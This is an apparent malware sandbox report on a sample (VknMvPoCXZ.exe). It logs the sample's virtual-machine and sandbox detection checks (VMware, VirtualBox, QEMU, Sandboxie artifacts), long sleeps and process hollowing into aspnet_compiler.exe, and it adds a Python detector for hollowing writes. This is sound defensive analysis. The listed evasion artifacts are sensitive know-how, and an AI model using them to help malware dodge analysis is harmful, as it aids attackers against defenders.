                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      Yara detected AntiVM3
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.37d17e0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.VknMvPoCXZ.exe.3ba8c40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.7380000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.VknMvPoCXZ.exe.3ba8c40.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3fa14c0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.37d17e0.21.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.37d17e0.27.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.3.481F404B.exe.4430a90.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.37d17e0.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.6bd0000.36.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.6bd0000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3ef0098.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.3.481F404B.exe.4430a90.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.37d17e0.27.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.6bd0000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.6bd0000.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.3.svchost.exe.3d58c40.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.37d17e0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.37d17e0.21.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.7380000.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.6bd0000.36.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.6bd0000.35.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.6bd0000.35.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.6bd0000.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.37d17e0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.3.svchost.exe.3d58c40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3fa14c0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.384861016.0000000006BD0000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.430706914.00000000037D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.373977104.00000000043BA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.593102084.0000000006BD0000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000003.380174976.0000000003CE2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.263705038.0000000003B32000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.587807203.00000000037D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.432260240.00000000037D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.505699283.0000000006BD0000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.373601058.00000000037D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000002.583823180.0000000003FA1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000002.588230224.0000000007380000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: VknMvPoCXZ.exe PID: 2244, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 481F404B.exe PID: 6392, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5532, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4496, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: VknMvPoCXZ.exe, 00000001.00000000.402866730.00000000026E1000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.567470983.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: VknMvPoCXZ.exe, 00000001.00000000.402866730.00000000026E1000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.567470983.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: VknMvPoCXZ.exe, 00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmp, 481F404B.exe, 00000018.00000003.373977104.00000000043BA000.00000004.00000001.sdmp, svchost.exe, 00000025.00000003.380174976.0000000003CE2000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL/WINE_GET_UNIX_FILE_NAMEQEMU
                      Source: VknMvPoCXZ.exe, 00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmp, 481F404B.exe, 00000018.00000003.373977104.00000000043BA000.00000004.00000001.sdmp, svchost.exe, 00000025.00000003.380174976.0000000003CE2000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLLUSER
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\System32\svchost.exe TID: 6036Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6296Thread sleep time: -14757395258967632s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5168Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6224Thread sleep count: 3116 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6560Thread sleep time: -20291418481080494s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6932Thread sleep count: 109 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6348Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6492Thread sleep count: 1460 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6672Thread sleep time: -15679732462653109s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6580Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6536Thread sleep count: 1154 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6708Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6628Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6688Thread sleep count: 1756 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7008Thread sleep time: -18446744073709540s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6688Thread sleep count: 204 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6784Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6216Thread sleep count: 1958 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4308Thread sleep time: -10145709240540247s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6280Thread sleep count: 62 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3396Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2876Thread sleep count: 2068 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6960Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6332Thread sleep count: 106 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6680Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6824Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4304Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6696Thread sleep time: -6456360425798339s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6700Thread sleep count: 4209 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6700Thread sleep count: 3142 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6696Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (16 identical entries)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3337
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3116
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1460
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1154
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1756
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1958
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2068
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2427
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 4209
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 3142
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeFile opened / queried: C:\WINDOWS\SysWOW64\drivers\vmmouse.sys
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeFile opened / queried: C:\WINDOWS\SysWOW64\drivers\vmhgfs.sys
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeFile opened / queried: C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (16 identical entries)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 30000
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile opened: C:\Users\user\AppData\
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile opened: C:\Users\user\
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                      Source: svchost.exe, 00000028.00000002.567470983.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: rm"SOFTWARE\VMware, Inc.\VMware Tools
                      Source: svchost.exe, 00000028.00000002.567470983.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: VMware
                      Source: svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmpBinary or memory string: !noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: VknMvPoCXZ.exe, 00000001.00000000.359026975.0000000000AC8000.00000004.00000001.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareW_MATVN9Win32_VideoControllerHOLHWM8BVideoController120060621000000.000000-00029545192display.infMSBDAT374VDSOPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsR8CMBEKU
                      Source: svchost.exe, 00000004.00000002.565151015.0000028D9A45F000.00000004.00000001.sdmpBinary or memory string: "@Hyper-V RAW
                      Source: svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmpBinary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
                      Source: svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmpBinary or memory string: VMwareVBoxARun using valid operating system
                      Source: svchost.exe, 00000028.00000002.567470983.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: rm&C:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: svchost.exe, 00000028.00000002.567470983.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: rm%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: svchost.exe, 00000004.00000002.564749589.0000028D9A449000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 00000008.00000002.551410688.0000017E86402000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                      Source: svchost.exe, 00000028.00000002.567470983.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: svchost.exe, 00000028.00000002.567470983.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: rm)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmpBinary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: VknMvPoCXZ.exe, 00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmp, 481F404B.exe, 00000018.00000003.373977104.00000000043BA000.00000004.00000001.sdmp, svchost.exe, 00000025.00000003.380174976.0000000003CE2000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmpBinary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
                      Source: svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: svchost.exe, 00000004.00000002.557362596.0000028D94C24000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW@aF
                      Source: svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmpBinary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: svchost.exe, 00000028.00000002.567470983.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: rm'C:\WINDOWS\system32\drivers\vmmouse.sys
                      Source: svchost.exe, 00000008.00000002.551595749.0000017E86429000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.561851061.000002BA27C67000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.557866132.000002A146A2A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 6_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 2328
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: Debug
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeCode function: 1_2_024C6AD8 LdrInitializeThunk,
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      Injects a PE file into a foreign process
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
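                      The single line above is the whole record of the injection: the parent writes into aspnet_compiler.exe (a signed .NET Framework binary it launched itself) at address 0x400000, and the written bytes begin with 4D 5A, the MZ signature. That is process hollowing: the legitimate image is replaced in place by the payload PE. A sandbox usually logs only a short prefix of the written data, so a detector has to grade a bare "MZ" differently from a complete header whose preferred ImageBase matches the destination address. The following Python is an added example written for this report, not code from the sandbox or from the sample. The MemoryWrite record is an assumption about how write telemetry is shaped, and the PE header used as input is a constructed fixture, not bytes recovered from the malware.

```python
import struct
from dataclasses import dataclass

IMAGE_DOS_SIGNATURE = b"MZ"
IMAGE_NT_SIGNATURE = b"PE\x00\x00"
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


@dataclass
class MemoryWrite:
    """Assumed telemetry shape for one WriteProcessMemory-style event."""
    source_image: str   # process issuing the write
    target_image: str   # process whose memory is written
    address: int        # destination address inside the target
    data: bytes         # bytes written; sandboxes often keep only a short prefix


def parse_pe_image_base(blob: bytes):
    """Return the preferred ImageBase of a PE header, or None if blob is not one.
    Walks IMAGE_DOS_HEADER.e_lfanew -> 'PE\\0\\0' -> 20-byte COFF header -> optional header."""
    if len(blob) < 0x40 or blob[:2] != IMAGE_DOS_SIGNATURE:
        return None
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    opt = e_lfanew + 4 + 20
    if opt + 32 > len(blob) or blob[e_lfanew:e_lfanew + 4] != IMAGE_NT_SIGNATURE:
        return None
    magic = struct.unpack_from("<H", blob, opt)[0]
    if magic == PE32_MAGIC:       # 32-bit optional header: ImageBase is a DWORD at +28
        return struct.unpack_from("<I", blob, opt + 28)[0]
    if magic == PE32PLUS_MAGIC:   # 64-bit optional header: ImageBase is a QWORD at +24
        return struct.unpack_from("<Q", blob, opt + 24)[0]
    return None


def classify_write(ev: MemoryWrite) -> dict:
    """Grade one memory write for process-hollowing indicators."""
    cross_process = ev.source_image.lower() != ev.target_image.lower()
    starts_with_mz = ev.data[:2] == IMAGE_DOS_SIGNATURE
    image_base = parse_pe_image_base(ev.data)
    evidence = []
    if cross_process:
        evidence.append("write targets a foreign process")
    if starts_with_mz:
        evidence.append("written data starts with 4D 5A (MZ)")
    if image_base is not None:
        evidence.append(f"parseable PE header, preferred ImageBase 0x{image_base:X}")
        if image_base == ev.address:
            evidence.append("write lands at the image's own ImageBase: in-place image replacement")
    if cross_process and image_base is not None and image_base == ev.address:
        verdict = "high"
    elif cross_process and starts_with_mz:
        verdict = "medium"   # prefix-only telemetry, or a PE written at a relocated address
    elif starts_with_mz:
        verdict = "low"      # a process writing a PE into itself: packer or loader behaviour
    else:
        verdict = "none"
    return {"verdict": verdict, "evidence": evidence}


def build_pe_header(image_base: int, pe32plus: bool = False) -> bytes:
    """Constructed fixture: a header-only PE image with the requested ImageBase."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = IMAGE_DOS_SIGNATURE
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    machine = 0x8664 if pe32plus else 0x14C
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, 240 if pe32plus else 224, 0x102)
    if pe32plus:
        opt = struct.pack("<HBBIIIIIQ", PE32PLUS_MAGIC, 14, 0, 0, 0, 0, 0x1000, 0x1000, image_base)
    else:
        opt = struct.pack("<HBBIIIIIII", PE32_MAGIC, 14, 0, 0, 0, 0, 0x1000, 0x1000, 0x2000, image_base)
    return bytes(dos) + IMAGE_NT_SIGNATURE + coff + opt


if __name__ == "__main__":
    # Constructed events modelled on the report's observation, not exported telemetry.
    src = r"C:\Users\user\Desktop\VknMvPoCXZ.exe"
    dst = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    full = MemoryWrite(src, dst, 0x400000, build_pe_header(0x400000))
    prefix_only = MemoryWrite(src, dst, 0x400000, b"\x4d\x5a")
    for ev in (full, prefix_only):
        print(classify_write(ev))
```

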